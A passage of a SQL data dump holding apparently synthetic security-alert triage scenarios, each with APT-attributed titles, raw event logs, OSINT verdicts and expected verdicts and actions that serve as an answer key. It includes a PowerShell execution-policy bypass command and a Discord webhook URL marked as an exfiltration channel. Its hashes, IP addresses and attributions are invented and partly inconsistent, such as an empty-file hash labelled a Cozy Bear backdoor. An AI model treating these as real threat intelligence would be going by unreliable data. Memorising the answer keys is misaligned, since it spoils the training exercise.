gateway\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Despite the failed login attempts, the source IP is known for benign activities and does not indicate a true threat.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:17:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"gateway01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-15T20:57:16.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:17:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"gateway01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-15T20:56:16.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:17:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"gateway01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-15T20:55:16.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:17:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"gateway01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-15T20:54:16.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:17:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"gateway01\\\",\\\"failed_attempts\\\":10}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1775, 'Cozy Bear Process Hollowing Attack', 'critical', 'Splunk', 'Detected a process hollowing attack on a healthcare network server, likely linked to Cozy Bear\'s recent campaigns.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:50:21Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.5.75\",\"dst_ip\":\"192.168.5.76\",\"username\":\"svc_process\",\"hostname\":\"server03\",\"command_line\":\"powershell.exe -exec bypass -file C:\\\\temp\\\\malicious.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to process hollowing malware used by Cozy Bear\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -exec bypass -file C:\\\\temp\\\\malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process execution using PowerShell bypass technique\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.5.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected server\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process hollowing technique is consistent with Cozy Bear\'s known TTPs, indicating a serious compromise.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.265Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.75\\\",\\\"dst_ip\\\":\\\"192.168.5.76\\\",\\\"username\\\":\\\"svc_process\\\",\\\"hostname\\\":\\\"server03\\\",\\\"command_line\\\":\\\"powershell.exe -exec bypass -file C:\\\\\\\\temp\\\\\\\\malicious.ps1\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.265Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.75\\\",\\\"dst_ip\\\":\\\"192.168.5.76\\\",\\\"username\\\":\\\"svc_process\\\",\\\"hostname\\\":\\\"server03\\\",\\\"command_line\\\":\\\"powershell.exe -exec bypass -file C:\\\\\\\\temp\\\\\\\\malicious.ps1\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.265Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.75\\\",\\\"dst_ip\\\":\\\"192.168.5.76\\\",\\\"username\\\":\\\"svc_process\\\",\\\"hostname\\\":\\\"server03\\\",\\\"command_line\\\":\\\"powershell.exe -exec bypass -file C:\\\\\\\\temp\\\\\\\\malicious.ps1\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.265Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.75\\\",\\\"dst_ip\\\":\\\"192.168.5.76\\\",\\\"username\\\":\\\"svc_process\\\",\\\"hostname\\\":\\\"server03\\\",\\\"command_line\\\":\\\"powershell.exe -exec bypass -file C:\\\\\\\\temp\\\\\\\\malicious.ps1\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.265Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.75\\\",\\\"dst_ip\\\":\\\"192.168.5.76\\\",\\\"username\\\":\\\"svc_process\\\",\\\"hostname\\\":\\\"server03\\\",\\\"command_line\\\":\\\"powershell.exe -exec bypass -file C:\\\\\\\\temp\\\\\\\\malicious.ps1\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1776, 'APT41 Spear-Phishing Attempt with Malicious Attachment', 'high', 'MISP', 'A spear-phishing email was detected targeting finance employees with a malicious Excel attachment that exploits a zero-day vulnerability.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"FIN-EXCH-01\",\"email_sender\":\"hr@fakedomain.com\",\"subject\":\"Urgent: Q1 Financial Report\",\"attachment_name\":\"Financial_Report_Q1.xls\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 112 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"hr@fakedomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Domain involved in multiple spear-phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Excel zero-day exploit\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious IP and included a file hash associated with zero-day exploits.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.267Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"FIN-EXCH-01\\\",\\\"email_sender\\\":\\\"hr@fakedomain.com\\\",\\\"subject\\\":\\\"Urgent: Q1 Financial Report\\\",\\\"attachment_name\\\":\\\"Financial_Report_Q1.xls\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.267Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"FIN-EXCH-01\\\",\\\"email_sender\\\":\\\"hr@fakedomain.com\\\",\\\"subject\\\":\\\"Urgent: Q1 Financial Report\\\",\\\"attachment_name\\\":\\\"Financial_Report_Q1.xls\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.267Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"FIN-EXCH-01\\\",\\\"email_sender\\\":\\\"hr@fakedomain.com\\\",\\\"subject\\\":\\\"Urgent: Q1 Financial Report\\\",\\\"attachment_name\\\":\\\"Financial_Report_Q1.xls\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.267Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"FIN-EXCH-01\\\",\\\"email_sender\\\":\\\"hr@fakedomain.com\\\",\\\"subject\\\":\\\"Urgent: Q1 Financial Report\\\",\\\"attachment_name\\\":\\\"Financial_Report_Q1.xls\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.267Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"FIN-EXCH-01\\\",\\\"email_sender\\\":\\\"hr@fakedomain.com\\\",\\\"subject\\\":\\\"Urgent: Q1 Financial Report\\\",\\\"attachment_name\\\":\\\"Financial_Report_Q1.xls\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1777, 'Lazarus Group Using Discord for C2 Communication', 'critical', 'ThreatConnect', 'Lazarus Group has been detected using Discord as a C2 channel to control malware on compromised financial systems.', 'Data Exfil', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T02:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.2\",\"username\":\"asmith\",\"hostname\":\"FIN-SERV-09\",\"domain\":\"discordapp.com\",\"url\":\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\"}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP linked to C2 infrastructure for Lazarus Group\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL used for C2 communication by known APT group\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"discordapp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Domain frequently used in benign and malicious activity\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The network traffic indicates data exfiltration via Discord, associated with the Lazarus Group.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.269Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.2\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"FIN-SERV-09\\\",\\\"domain\\\":\\\"discordapp.com\\\",\\\"url\\\":\\\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.269Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.2\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"FIN-SERV-09\\\",\\\"domain\\\":\\\"discordapp.com\\\",\\\"url\\\":\\\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.269Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.2\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"FIN-SERV-09\\\",\\\"domain\\\":\\\"discordapp.com\\\",\\\"url\\\":\\\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.269Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.2\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"FIN-SERV-09\\\",\\\"domain\\\":\\\"discordapp.com\\\",\\\"url\\\":\\\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.269Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.2\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"FIN-SERV-09\\\",\\\"domain\\\":\\\"discordapp.com\\\",\\\"url\\\":\\\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1778, 'Cozy Bear Supply Chain Attack - Malicious Software Update', 'critical', 'Recorded Future', 'A software update from a compromised vendor was detected, containing a backdoor used by Cozy Bear to infiltrate financial systems.', 'Malware', 'T1195', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T01:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.10\",\"hostname\":\"FIN-APP-03\",\"command_line\":\"C:\\\\Program Files\\\\Vendor\\\\Update\\\\updater.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Cozy Bear backdoor\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Vendor\\\\Update\\\\updater.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable used in known supply chain attack\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The update process executed a binary with a hash linked to Cozy Bear\'s backdoor.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T01:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"hostname\\\":\\\"FIN-APP-03\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Vendor\\\\\\\\Update\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T01:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"hostname\\\":\\\"FIN-APP-03\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Vendor\\\\\\\\Update\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T01:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"hostname\\\":\\\"FIN-APP-03\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Vendor\\\\\\\\Update\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T01:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"hostname\\\":\\\"FIN-APP-03\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Vendor\\\\\\\\Update\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T01:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"hostname\\\":\\\"FIN-APP-03\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Vendor\\\\\\\\Update\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1779, 'Fancy Bear Fast-Flux DNS and DGA Domain Activity Detected', 'high', 'Anomali', 'Fancy Bear is using fast-flux DNS and DGA-generated domains to obscure command and control communications targeting financial institutions.', 'C2 Communication', 'T1568.003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T00:50:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.75\",\"dst_ip\":\"203.0.113.250\",\"hostname\":\"FIN-NET-05\",\"domain\":\"xyzt1234.com\"}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.250\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in fast-flux DNS activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xyzt1234.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"DGA domain used for C2 by Fancy Bear\"}}],\"expected_actions\":[\"block_domain\",\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The domain and IP are consistent with fast-flux and DGA activities linked to Fancy Bear.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.273Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T00:50:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.75\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"hostname\\\":\\\"FIN-NET-05\\\",\\\"domain\\\":\\\"xyzt1234.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.273Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T00:50:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.75\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"hostname\\\":\\\"FIN-NET-05\\\",\\\"domain\\\":\\\"xyzt1234.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.273Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T00:50:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.75\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"hostname\\\":\\\"FIN-NET-05\\\",\\\"domain\\\":\\\"xyzt1234.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.273Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T00:50:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.75\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"hostname\\\":\\\"FIN-NET-05\\\",\\\"domain\\\":\\\"xyzt1234.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.273Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 